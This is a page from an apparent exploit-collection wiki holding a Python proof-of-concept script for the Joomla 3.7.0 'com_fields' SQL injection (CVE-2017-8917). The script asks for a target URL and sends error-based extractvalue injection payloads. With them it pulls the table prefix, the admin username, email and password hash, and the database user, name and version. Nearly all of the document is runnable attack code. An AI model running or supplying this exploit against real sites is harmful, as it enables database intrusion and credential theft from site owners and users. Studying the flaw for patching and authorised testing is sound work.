menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right Joomla chevron_right Joomla 3.7.0 SQL注入(CVE-2017-8917) chevron_right CVE-2017-8917.py
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    CVE-2017-8917.py
    2.36 KB / 2021-06-28 05:31:32
        # Exploit Joomla 3.7.0 'com_fields' SQL Injection
# CVE : CVE-2017-8917
# Author :  SiopySh <[email protected]>

import requests
from bs4 import BeautifulSoup
from art import *

print("Joomla CVE")
print("--- Version : Joomla 3.7.0 ---")
print("--- Date : 05/27/2021 ---")
print("--- CVE : CVE-2017-8917 ---")
print("--- Exploit Author : SiopySh <[email protected]> - Twitter @siopysh ---")
print(" ")

ip = input("URL (ex: http://10.10.10.10/) : ")

url = ip + "index.php?option=com_fields&view=fields&layout=modal&list[fullordering]="

def processPayload(payload):
	page = requests.get(url+payload)
	soup = BeautifulSoup(page.text, 'html.parser')
	response = soup.find_all('blockquote')[0].get_text().split('~~~')[1]
	return response

print(" ")
prefix = processPayload("1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,hex(table_name),0x7e7e7e)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1)))=1")
prefix = bytes.fromhex(prefix).decode('utf-8').split('_')[0]
print("* Database prefix : " + prefix)
print("* Joomla user : " + processPayload(f"1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(username,1,20),0x7e7e7e)/**/from/**/{prefix}_users/**/limit/**/0,1)))=1"))
print("* Joomla user mail : " + processPayload(f"1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(email,1,20),0x7e7e7e)/**/from/**/{prefix}_users/**/limit/**/0,1)))=1"))

searchpassword = True
password = ""
index = 1

while(searchpassword):
	payload_password = f"1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(password,{index},10),0x7e7e7e)/**/from/**/{prefix}_users/**/limit/**/0,1)))=1"
	page = requests.get(url+payload_password)
	soup = BeautifulSoup(page.text, 'html.parser')
	response = soup.find_all('blockquote')[0].get_text().split('~~~')[1]
	if(response == ""):
		searchpassword = False
	else:
		password += response
		index+=10
print("* Joomla user password : " + password)

print("* Database user : " + processPayload("1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(user(),1,20),0x7e7e7e))))=1"))
print("* Database name : " + processPayload("1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(database(),1,20),0x7e7e7e))))=1"))
print("* Database version : " + processPayload("1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(version(),1,20),0x7e7e7e))))=1"))
    links
    file_download